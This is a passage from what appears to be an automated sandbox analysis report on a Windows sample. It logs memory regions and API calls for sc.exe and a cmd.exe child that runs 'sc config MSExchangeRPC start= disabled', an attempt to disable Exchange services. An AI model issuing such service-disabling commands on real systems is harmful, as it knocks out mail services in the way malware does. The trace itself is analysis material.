= 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8383 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8384 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8385 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8386 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8387 start_va = 0x7e740000 end_va = 0x7e83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e740000" filename = "" Region: id = 8388 start_va = 0x7e866000 end_va = 0x7e868fff entry_point = 0x0 region_type = private name = "private_0x000000007e866000" filename = "" Region: id = 8389 start_va = 0xca0000 end_va = 0xd7efff entry_point = 0xca0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8390 start_va = 0x990000 end_va = 0x9a1fff entry_point = 0x990000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 521 os_tid = 0xca0 [0132.557] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0132.557] __set_app_type (_Type=0x1) [0132.557] __p__fmode () returned 0x77ac4d6c [0132.557] __p__commode () returned 0x77ac5b1c [0132.557] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0132.557] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0132.557] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.560] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0132.560] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0132.560] _wcsicmp (_String1="config", _String2="query") returned -14 [0132.560] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0132.560] _wcsicmp (_String1="config", _String2="start") returned -16 [0132.560] _wcsicmp (_String1="config", _String2="pause") returned -13 [0132.560] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0132.560] _wcsicmp (_String1="config", _String2="control") returned -14 [0132.560] _wcsicmp (_String1="config", _String2="continue") returned -14 [0132.560] _wcsicmp (_String1="config", _String2="stop") returned -16 [0132.560] _wcsicmp (_String1="config", _String2="config") returned 0 [0132.560] ResolveDelayLoadedAPI () returned 0x77262c10 [0132.560] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xa08540 [0132.562] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0132.562] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0132.562] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0132.562] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0132.562] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0132.562] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0132.562] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0132.563] OpenServiceW (hSCManager=0xa08540, lpServiceName="MSExchangeRepl", dwDesiredAccess=0x3) returned 0x0 [0132.563] GetLastError () returned 0x424 [0132.563] _ultow (in: _Dest=0x424, _Radix=9172784 | out: _Dest=0x424) returned="1060" [0132.563] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0132.564] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x8bf70c, nSize=0x2, Arguments=0x8bf724 | out: lpBuffer="裐 \x8b蔔è") returned 0x62 [0132.565] GetFileType (hFile=0x3c) returned 0x2 [0132.565] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x8bf6f0 | out: lpMode=0x8bf6f0) returned 1 [0132.565] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa088d0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x8bf700, lpReserved=0x0 | out: lpBuffer=0xa088d0*, lpNumberOfCharsWritten=0x8bf700*=0x62) returned 1 [0132.565] LocalFree (hMem=0xa088d0) returned 0x0 [0132.565] LocalFree (hMem=0x0) returned 0x0 [0132.565] CloseServiceHandle (hSCObject=0xa08540) returned 1 [0132.565] LocalFree (hMem=0x0) returned 0x0 [0132.565] exit (_Code=1060) Thread: id = 522 os_tid = 0xc9c Process: id = "158" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3f979000" os_pid = "0xc90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeRPC start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8391 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8392 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 8393 start_va = 0x4410000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 8394 start_va = 0x4430000 end_va = 0x4430fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 8395 start_va = 0x4440000 end_va = 0x4453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 8396 start_va = 0x4460000 end_va = 0x449ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 8397 start_va = 0x44a0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 8398 start_va = 0x45a0000 end_va = 0x45a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 8399 start_va = 0x45b0000 end_va = 0x45b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 8400 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 8401 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8402 start_va = 0x7ef10000 end_va = 0x7ef32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef10000" filename = "" Region: id = 8403 start_va = 0x7ef33000 end_va = 0x7ef33fff entry_point = 0x0 region_type = private name = "private_0x000000007ef33000" filename = "" Region: id = 8404 start_va = 0x7ef37000 end_va = 0x7ef37fff entry_point = 0x0 region_type = private name = "private_0x000000007ef37000" filename = "" Region: id = 8405 start_va = 0x7ef3d000 end_va = 0x7ef3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef3d000" filename = "" Region: id = 8406 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8407 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8408 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8409 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8410 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8411 start_va = 0x4670000 end_va = 0x467ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 8412 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8413 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8414 start_va = 0x4690000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 8415 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8456 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 8457 start_va = 0x45d0000 end_va = 0x460ffff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 8458 start_va = 0x4790000 end_va = 0x484dfff entry_point = 0x4790000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8459 start_va = 0x4850000 end_va = 0x494ffff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 8460 start_va = 0x4ac0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 8461 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8462 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8463 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8464 start_va = 0x7ee10000 end_va = 0x7ef0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee10000" filename = "" Region: id = 8465 start_va = 0x7ef3a000 end_va = 0x7ef3cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef3a000" filename = "" Region: id = 8466 start_va = 0x4420000 end_va = 0x4423fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 8467 start_va = 0x4430000 end_va = 0x4433fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 8468 start_va = 0x4ad0000 end_va = 0x4e06fff entry_point = 0x4ad0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 523 os_tid = 0x820 [0132.719] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0132.719] __set_app_type (_Type=0x1) [0132.719] __p__fmode () returned 0x77ac4d6c [0132.719] __p__commode () returned 0x77ac5b1c [0132.719] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0132.719] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0132.719] GetCurrentThreadId () returned 0x820 [0132.719] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x820) returned 0x84 [0132.719] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.719] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0132.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.722] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.722] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x459fc04 | out: phkResult=0x459fc04*=0x0) returned 0x2 [0132.722] VirtualQuery (in: lpAddress=0x459fc0b, lpBuffer=0x459fbbc, dwLength=0x1c | out: lpBuffer=0x459fbbc*(BaseAddress=0x459f000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.722] VirtualQuery (in: lpAddress=0x44a0000, lpBuffer=0x459fbbc, dwLength=0x1c | out: lpBuffer=0x459fbbc*(BaseAddress=0x44a0000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.722] VirtualQuery (in: lpAddress=0x44a1000, lpBuffer=0x459fbbc, dwLength=0x1c | out: lpBuffer=0x459fbbc*(BaseAddress=0x44a1000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.722] VirtualQuery (in: lpAddress=0x44a3000, lpBuffer=0x459fbbc, dwLength=0x1c | out: lpBuffer=0x459fbbc*(BaseAddress=0x44a3000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.722] VirtualQuery (in: lpAddress=0x45a0000, lpBuffer=0x459fbbc, dwLength=0x1c | out: lpBuffer=0x459fbbc*(BaseAddress=0x45a0000, AllocationBase=0x45a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.722] GetConsoleOutputCP () returned 0x1b5 [0132.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.723] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0132.723] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.723] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0132.723] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.723] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.723] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.723] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.723] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.723] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.723] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.723] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0132.723] GetEnvironmentStringsW () returned 0x4697d98* [0132.724] FreeEnvironmentStringsA (penv="A") returned 1 [0132.724] GetEnvironmentStringsW () returned 0x4697d98* [0132.724] FreeEnvironmentStringsA (penv="A") returned 1 [0132.724] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459eb68 | out: phkResult=0x459eb68*=0x94) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x0, lpData=0x459eb74*=0xa3, lpcbData=0x459eb70*=0x1000) returned 0x2 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x1, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x0, lpData=0x459eb74*=0x1, lpcbData=0x459eb70*=0x1000) returned 0x2 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x0, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x40, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x40, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x0, lpData=0x459eb74*=0x40, lpcbData=0x459eb70*=0x1000) returned 0x2 [0132.724] RegCloseKey (hKey=0x94) returned 0x0 [0132.724] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459eb68 | out: phkResult=0x459eb68*=0x94) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x0, lpData=0x459eb74*=0x40, lpcbData=0x459eb70*=0x1000) returned 0x2 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x1, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x0, lpData=0x459eb74*=0x1, lpcbData=0x459eb70*=0x1000) returned 0x2 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x0, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x9, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x4, lpData=0x459eb74*=0x9, lpcbData=0x459eb70*=0x4) returned 0x0 [0132.724] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459eb6c, lpData=0x459eb74, lpcbData=0x459eb70*=0x1000 | out: lpType=0x459eb6c*=0x0, lpData=0x459eb74*=0x9, lpcbData=0x459eb70*=0x1000) returned 0x2 [0132.724] RegCloseKey (hKey=0x94) returned 0x0 [0132.724] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29835 [0132.724] srand (_Seed=0x5ad29835) [0132.724] GetCommandLineW () returned="/c sc config MSExchangeRPC start= disabled" [0132.724] GetCommandLineW () returned="/c sc config MSExchangeRPC start= disabled" [0132.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.725] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4699cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.725] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.725] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.725] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.725] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.725] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.725] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.725] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.725] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.725] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.725] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.725] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.725] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.725] GetEnvironmentStringsW () returned 0x4697d98* [0132.725] FreeEnvironmentStringsA (penv="A") returned 1 [0132.725] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.725] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.725] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.725] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.725] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.725] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.725] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.725] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.725] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.725] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.726] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x459f940 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.726] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x459f940, lpFilePart=0x459f938 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f938*="Desktop") returned 0x1d [0132.726] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.726] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x459f6c0 | out: lpFindFileData=0x459f6c0) returned 0x46905c8 [0132.726] FindClose (in: hFindFile=0x46905c8 | out: hFindFile=0x46905c8) returned 1 [0132.726] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x459f6c0 | out: lpFindFileData=0x459f6c0) returned 0x46905c8 [0132.726] FindClose (in: hFindFile=0x46905c8 | out: hFindFile=0x46905c8) returned 1 [0132.726] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0132.726] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x459f6c0 | out: lpFindFileData=0x459f6c0) returned 0x46905c8 [0132.726] FindClose (in: hFindFile=0x46905c8 | out: hFindFile=0x46905c8) returned 1 [0132.726] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.726] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0132.726] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0132.726] GetEnvironmentStringsW () returned 0x4697d98* [0132.726] FreeEnvironmentStringsA (penv="=") returned 1 [0132.726] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.727] GetConsoleOutputCP () returned 0x1b5 [0132.727] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.727] GetUserDefaultLCID () returned 0x409 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x459fa70, cchData=128 | out: lpLCData="0") returned 2 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x459fa70, cchData=128 | out: lpLCData="0") returned 2 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x459fa70, cchData=128 | out: lpLCData="1") returned 2 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, 